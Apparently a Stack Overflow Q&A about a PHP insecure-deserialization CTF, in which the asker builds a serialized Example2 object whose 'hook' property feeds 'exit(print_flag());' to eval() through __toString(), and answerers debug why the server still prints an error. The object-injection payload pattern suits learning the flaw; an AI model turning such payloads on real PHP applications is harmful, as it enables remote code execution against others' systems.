# Why is the code still being executed after "exit()"?

Tags: php, serialization, ctf

I'm doing a CTF challenge that is about insecure deserialization in PHP. The goal is to print the flag by injection code into the deserialization to execute the `print_flag()` function. I suspect that the webserver only prints the last line that the script echoes, which overrides the output of the flag, even when calling `exit()`.

A part of the php-code running on the webserver is provided. I have implemented it in my own php-script to find out what works and what doesn't. I have succeeded in serializing an object that executes the code when deserialized. By calling `exit(print_flag());` the flag is printed, without any further errors... At least in my script. When I send the serialized object to the webserver, it still prints further errors.

Additionally, I have tried returning a string from my injected code. That doesn't work either.

```
function print_flag() {
    print file_get_contents('/var/flag/flag.txt');
}

class Example2
{
    private $hook;

    function __construct() {
        $this->hook = "exit(print_flag());";
    }

    function __toString()
    {
        if (isset($this->hook)) eval($this->hook);
    }
}

$flag = new Example2();
$serialized = serialize($flag);
print "$serialized\r\n";
$deserialized = unserialize($serialized);
```

The code is similar to the one shown in the challenge, but modified so it works for me.

I would expect the code to only return the flag. When executing the script on my own machine, the output is:

> O:8:"Example2":1:{s:14:" Example2 hook";s:19:"exit(print_flag());";}
>   thisistheflag

When I call it without `exit()`:

> PHP Recoverable fatal error:  Method Example2::__toString() must
>   return a string value in ../phpObjInj.php on line 39"

The webserver returns:

> Catchable fatal error: Method Example2::__toString() must return a
>   string value in /var/www/index.php on line 79

How do I stop the error from printing?

Answer (score 0):

The error is occurring because of `unserialize($flag);`. Since the argument to `unserialize()` is supposed to be a string, it tries to convert the `Example2` object to a string. You probably meant to use `unserialize($serialized);`.

But more generally, you should ensure that the `__toString()` method returns a string. If you don't care what it is, you can return an empty string.

```
function __toString()
{
    if (isset($this->hook)) eval($this->hook);
    return "";
}
```

The error doesn't happen when you have `exit()` in the hook because the script exits before the `__toString()` method returns, so it never checks the return value.

Nothing is being executed after `exit()`. Here's the order of operations:

- `new Example2` - Creates new object
- `serialize($flag)` - Creates a string representing the object
- `print "$serialized\r\n";` - Print the above string

None of the above steps need to call `__toString()`, so the hook is not yet executed.

- `deserialize($flag)` - This needs to convert `$flag` to a string so it can be parsed as serialized data.

  - Call `$flag->__toString()`
  - `eval($this->hook)`
  - Call `print_flag()`, which prints the flag
  - Call `exit()`, which terminates the script

So you see the serialized object printed, then the flag is printed, then nothing else because of `exit()`.

To demonstrate the vulnerability, you should call `unserialize()` with the correct argument.

```
$deserialized = unserialize($seralized);
echo $deserialized;
```

This `echo` statement will cause the `__toString()` method to be invoked. This will then exit the script, and you won't get the error message.

Comment: Unfortunately, i have no control over the script on the website. The ```__toString()``` is like that in the server's script, apparently. That's why I'm trying to exit the script before it goes any further. The object that is serialized is my payload to the server. I can manipulate the ```hook``` property of the object in order to execute code remotely. Do you maybe know a reason for why the ```exit()``` call doesn't stop the server's script? Apparently, destructors are run after before the full stop.

Comment: I don't understand the question. It *does* exit the script.

Comment: That's why you don't see the error message unless you remove `exit`.

Comment: You're not executing any code when deserializing, because you're not deserializing the serialized data.

Comment: It exits the script on my machine. But I have to send a payload (the serialized object) to the server, in order to get the flag. [Description of the vulnerability](https://www.owasp.org/index.php/PHP_Object_Injection)

Comment: You're trying to use the object itself as if it's the serialized string.

Comment: I've updated the answer. You really need to use `unserialize($serialized)`, not `unserialize($flag)`

Comment: You are right. I missed that. Thank you. When I changed that in my code (I edited the question appropriately) the output of the script didn't change a bit. The only thing I can change is the serialized object, because that is my payload. The server deserializes the object I send to it, and then calls ```eval()``` on it. Because the ```__toString()``` of the server is broken, it shows me the error instead of my flag (I assume). Now I am trying to either supress the error message, or somehow fix it. Unfortunately, my deserialization doesn't affect the script on the server.

Answer (score 0):

Remove the double quotes in your constructor, `function __construct()`
instead of

```
function __construct() {
    $this->hook = "exit(print_flag());";
}
```

use

```
function __construct() {
    $this->hook = exit(print_flag());
}
```

Comment: Yes, it works fine on mine too. But it has to work on the server where I'm sending the payload to. It needs to be a string in order to get serialized. The vulnerability can be exploited by injecting code (in my case it's hook) into the deserializer. The injected code then gets executed when the toString() is called on the new object. [https://www.owasp.org/index.php/PHP_Object_Injection](See more here)